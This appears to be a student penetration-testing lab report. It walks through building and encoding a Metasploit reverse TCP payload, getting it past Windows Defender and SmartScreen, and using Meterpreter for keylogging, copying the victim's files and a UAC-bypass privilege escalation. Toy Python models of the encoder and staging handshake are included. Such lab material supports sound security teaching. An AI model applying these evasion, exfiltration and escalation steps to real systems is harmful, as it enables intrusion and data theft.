Task 3.3
The screenshot illustrates the creation of a reverse TCP payload with the msfvenom tool,
which is a component of the Metasploit framework. A reverse TCP payload makes the
infected machine open an outbound connection back to a listener on the attacker's
machine, through which the attacker can then execute commands remotely. Note that the
word "reverse" refers only to the direction of the connection: choosing port 443 helps the
traffic pass egress filters, but it does not make the traffic TLS (reverse_https would be the
TLS-wrapped transport), and the initial staging over reverse_tcp is sent in the clear.
In the highlighted section, we see the command used to generate an executable file (.exe)
named "Group3.exe". This file is configured to connect back to the attacker's host on IP
"10.10.10.3" through port 443.
The output of the command ls -la shows the files in the directory, including the newly
created "Group3.exe". Its presence is confirmed along with details such as file size and
timestamp.
Task 3.4
This slide illustrates a further technique used in penetration testing to make a payload
harder to recognise, this time focusing on the encoders shipped with the Metasploit
framework.
1. *Command Overview*:
- The initial command msfvenom -l encoders displays a list of the encoders available in
Metasploit. Encoders transform the payload bytes and prepend a small decoder stub that
restores them at run time, so that the stored file no longer matches a signature written
for the raw payload, such as those used by antivirus systems like Windows Defender.
2. *Selecting an Encoder*:
- A polymorphic encoder is chosen. Such an encoder generates a different version of the
payload each time it is used, which is intended to defeat signature-based detection.
3. *Output*:
- The encoder is applied in several iterations, each wrapping the previous result, as
shown by the payload size growing after each iteration. The result is written to an
executable named "Group3-2.exe". Encoding is, however, a weak evasion measure against
current antivirus: the decoder stub is itself signatured, and the payload must decode to
its original form in memory, where emulation and behavioural scanning can catch it
(compare the Windows Defender alert in Task 4.5).
4. *File Verification*:
- The ls -la command output confirms the presence of the newly created "Group3-2.exe" in
the directory, alongside other files.
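To make the signature point concrete, here is an added example in Python (not part of the lab slides and not Metasploit's own code) that imitates how msfvenom-style encoding with several iterations behaves: a toy single-byte XOR encoder with a fresh random key per pass and a constant decoder stub, plus two toy "antivirus signatures", one on the hash of the raw payload and one on the stub bytes. The payload stand-in, the stub bytes and the signatures are all constructed for this example; a real encoder's stub is machine code, and some real encoders also vary the stub itself, which the toy does not.

```python
import hashlib
import os
from typing import Optional

# Constructed stand-in for the raw payload bytes (not real shellcode).
RAW_PAYLOAD = b"RAW PAYLOAD STAND-IN: connect back to 10.10.10.3:443"

# Constant decoder stub. In a real encoder this is a few machine-code
# instructions that XOR the bytes that follow with the key and jump to them.
# Here it is a fixed, hypothetical byte marker so that a signature can match it.
DECODER_STUB = b"\xeb\x0d\x5e\x80\x36"
STUB_LEN = len(DECODER_STUB)


def encode_once(data: bytes, key: Optional[int] = None) -> bytes:
    """One encoder pass: stub + key byte + (data XOR key)."""
    if key is None:
        key = 1 + os.urandom(1)[0] % 255  # fresh non-zero key on every run
    body = bytes(b ^ key for b in data)
    return DECODER_STUB + bytes([key]) + body


def encode(data: bytes, iterations: int) -> bytes:
    """msfvenom -i N style: each pass wraps the previous output, so the inner
    stubs are themselves encoded and the size grows with every pass."""
    out = data
    for _ in range(iterations):
        out = encode_once(out)
    return out


def decode_once(blob: bytes) -> bytes:
    """What the stub does at run time (here in Python instead of machine code)."""
    if not blob.startswith(DECODER_STUB):
        raise ValueError("not an encoded blob: stub missing")
    key = blob[STUB_LEN]
    return bytes(b ^ key for b in blob[STUB_LEN + 1:])


def decode(blob: bytes, iterations: int) -> bytes:
    for _ in range(iterations):
        blob = decode_once(blob)
    return blob


def encoded_size(raw_len: int, iterations: int) -> int:
    """Size after N passes: each pass adds the stub plus one key byte."""
    return raw_len + iterations * (STUB_LEN + 1)


# Two toy antivirus signatures:
#  - the hash of the known raw payload (what a naive signature database holds)
#  - the byte pattern of the decoder stub (what a slightly smarter one holds)
RAW_HASH = hashlib.sha256(RAW_PAYLOAD).hexdigest()


def hash_signature_hits(sample: bytes) -> bool:
    return hashlib.sha256(sample).hexdigest() == RAW_HASH


def stub_signature_hits(sample: bytes) -> bool:
    return DECODER_STUB in sample


def scan(sample: bytes) -> dict:
    return {"hash": hash_signature_hits(sample), "stub": stub_signature_hits(sample)}


def variants(iterations: int, count: int) -> set:
    """Distinct encodings of the same payload produced by repeated runs."""
    return {encode(RAW_PAYLOAD, iterations) for _ in range(count)}


if __name__ == "__main__":
    print("raw payload scan:", scan(RAW_PAYLOAD))
    for n in (1, 3, 5):
        enc = encode(RAW_PAYLOAD, n)
        print(f"-i {n}: size {len(enc)} bytes, scan {scan(enc)}, "
              f"round trip ok: {decode(enc, n) == RAW_PAYLOAD}")
    print("distinct variants from 20 runs with -i 3:", len(variants(3, 20)))
```

Running the script shows the two halves of the argument in Task 3.4: the hash signature stops matching as soon as one pass is applied, and the output differs between runs, but the stub signature matches every variant because the outermost stub is always present in clear. The size grows by a fixed amount per pass, which is the behaviour visible in the msfvenom output on the slide.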
Task 4.5
In this task we look at setting up a listener for the reverse TCP payload using the
Metasploit Framework, and at delivering the executable to the Windows victim.
The attempt to download the executable results in a virus detection alert from Windows
Defender, indicating that the file has been recognised as malicious. This illustrates the
antivirus system's real-time detection and blocking, which applies even when the action is
initiated by a standard (non-administrative) user.
Task 4.7
In this task:
1. *SmartScreen Warning*: A non-admin user attempts to run an executable named
"Group3.exe", which is flagged as a potentially harmful file. A Windows SmartScreen
warning appears, stating that the file's safety cannot be verified because the SmartScreen
service could not be reached, and presenting the user with the options to run or not run
the file.
2. *Metasploit Configuration*: In the second screenshot, Metasploit's multi/handler is
configured to listen for the incoming connection from the reverse TCP payload. The
payload details shown (windows/meterpreter/reverse_tcp) specify that upon execution the
malware will connect back to the attacker's IP (10.10.10.3) and port (443); the LHOST and
LPORT set on the handler must match the values the payload was generated with.
3. *Successful Connection*: The final part of the image shows that despite the warning
the executable was run, and a Meterpreter session was opened. The malware executed,
got past the local defences (SmartScreen, unable to reach its reputation service, only
warned rather than blocked, and the user chose to run the file), and established a reverse
TCP connection to the attacker's machine, giving remote control over the victim's
computer.
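As an added example (not from the slides and not Metasploit's code), the following Python script models the exchange between the multi/handler and the reverse_tcp payload described in Tasks 3.3 and 4.7, over loopback: the victim side opens the outbound connection, and the handler answers with a 4-byte little-endian length followed by the stage, which is the shape of Metasploit's classic reverse_tcp staging handshake. The stage here is a constructed text blob and nothing is executed; 127.0.0.1 and an ephemeral port stand in for LHOST 10.10.10.3 and LPORT 443, and the MAX_STAGE sanity limit is the example's own addition.

```python
import socket
import struct
import threading

# Constructed stand-in for the stage (in the lab this would be the Meterpreter DLL).
STAGE = b"STAGE STAND-IN: this is where the handler would send the Meterpreter stage"

# The example's own sanity limit; a real stager trusts the advertised length.
MAX_STAGE = 16 * 1024 * 1024


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise; TCP may deliver them in pieces."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed before %d bytes arrived" % n)
        buf += chunk
    return bytes(buf)


def parse_stage_header(hdr: bytes) -> int:
    """Handler -> stager: a 4-byte little-endian stage length."""
    if len(hdr) != 4:
        raise ValueError("stage header must be 4 bytes")
    (n,) = struct.unpack("<I", hdr)
    if n == 0 or n > MAX_STAGE:
        raise ValueError("implausible stage length %d" % n)
    return n


def handler_side(srv: socket.socket, stage: bytes, result: dict) -> None:
    """Role of exploit/multi/handler: wait for the connect-back, send the stage."""
    conn, peer = srv.accept()
    with conn:
        result["peer"] = peer
        conn.sendall(struct.pack("<I", len(stage)) + stage)


def stager_side(lhost: str, lport: int) -> bytes:
    """Role of the payload in Group3.exe: connect outbound to LHOST:LPORT,
    read the length header, then read the stage itself."""
    with socket.create_connection((lhost, lport), timeout=5) as s:
        n = parse_stage_header(recv_exact(s, 4))
        return recv_exact(s, n)


def run_exchange(stage: bytes = STAGE) -> dict:
    """Run both sides over loopback and report what each side saw."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.settimeout(5)
    srv.bind(("127.0.0.1", 0))  # LHOST/LPORT stand-in; the lab used 10.10.10.3:443
    srv.listen(1)
    lport = srv.getsockname()[1]
    result = {"lport": lport}
    t = threading.Thread(target=handler_side, args=(srv, stage, result))
    t.start()
    try:
        result["stage"] = stager_side("127.0.0.1", lport)
    finally:
        t.join()
        srv.close()
    # The victim chose its own ephemeral source port: the connection is outbound
    # from the victim, which is why reverse payloads pass egress-only firewalls.
    result["victim_port"] = result["peer"][1]
    return result


if __name__ == "__main__":
    r = run_exchange()
    print("handler listened on port", r["lport"])
    print("victim connected from port", r["victim_port"])
    print("stage received intact:", r["stage"] == STAGE, "(%d bytes)" % len(r["stage"]))
```

Two practical points follow from the exchange. The handler must be listening before the executable runs, because the victim initiates the connection and there is nothing for it to reach otherwise, which is why Task 4.7 configures multi/handler first. And the length-prefixed stage is sent in plain TCP regardless of the port number, which is both why network detections for Metasploit staging key on this handshake and why reverse_https, not port 443 alone, is what gives the transport TLS.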
Task 4.8
In this task:
1. The session begins with navigation commands (pwd and cd) to confirm the current
working directory on the victim's machine, which is the root of the C: drive.
Task 4.9
The image shows files from the "Documents" folder of a Windows 10 system being
downloaded to a Kali Linux system using Meterpreter, the payload within the Metasploit
framework that provides remote access to the compromised system.
We navigate to the "Documents" directory with the cd command, and then list its contents
with the dir command, revealing the files and folders present.
After that:
- The Meterpreter command download Documents is used to transfer the contents of the
"Documents" directory to the Kali Linux system.
- The output shows the progress of each file as it is downloaded; the files mentioned
include "Group3" and "Group3.txt".
Task 4.12
This task demonstrates the use of a keystroke logger implemented through Meterpreter.
1. *Dumping Keystrokes*:
- The keyscan_dump command is used to display the keystrokes captured since the logger
was started with keyscan_start. This results in the output "HELLO THIS IS GROUP3", the
text that was typed during the logging session.
2. *Downloading the Keystroke File*:
- "keystroke.txt" is downloaded to the Kali Linux system using the download command,
specifying the file's location on the desktop of the Windows machine.
3. *Verification of Download*:
- The final part of the image shows the Kali Linux file system with the "keystroke.txt"
file successfully transferred.
Task 5.13
This task covers the use of Meterpreter to identify local vulnerabilities (privilege
escalation opportunities) on a Windows virtual machine (VM) using tools available on a
Kali Linux system.
1. *Reverse TCP Handler*: the handler receives the connection from the target Windows
VM and a Meterpreter session is established.
After that:
- The command run post/multi/recon/local_exploit_suggester is issued from the session.
This Metasploit post module enumerates the local exploit modules that match the
session's platform and architecture and runs each module's check routine against the
compromised system.
- The module collects data and reports which exploits the target may be vulnerable to.
Task 5.14
This slide shows the output of the Metasploit module used to identify potential local
exploits on a Windows machine. The module, local_exploit_suggester, runs the check
routine of each candidate local exploit against the target.
1. *List of Exploits*: The output shows a list of exploit modules along with the result of
each check, i.e. whether the target appears vulnerable to that exploit.
2. *Specific Exploits*: The top entry in the list is marked "Yes" for potentially
vulnerable, with the message "The target appears to be vulnerable". Note that "appears
to be vulnerable" is the verdict of a check routine, not proof; it is confirmed only when
the exploit is actually run, as in Task 5.15.
Task 5.15
1. *Exploit Execution*:
- The exploit is run, and the process begins with the start of a reverse TCP handler on
the specified local host and port.
- The exploit bypasses UAC, as indicated by the module output stating that UAC is set to
Default and that the current user is part of the Administrators group before it continues.
(UAC bypasses of this kind only work for a user who is already a member of the
Administrators group but running at medium integrity; they do not elevate a standard
user.)
2. *Result of Exploit*:
- After execution, the payload delivers a new Meterpreter session with elevated
privileges, evidenced by session 2 being opened.
- Commands like pwd (print working directory) show the session is operating from the
System32 directory. This is only where the new process was started: reading System32 is
permitted to any user, so the working directory alone is not evidence of elevation. The
privilege level should be confirmed with getuid and getprivs (and getsystem can then be
used to escalate further to SYSTEM).
- The sysinfo command confirms the system details, including the architecture and
operating system version.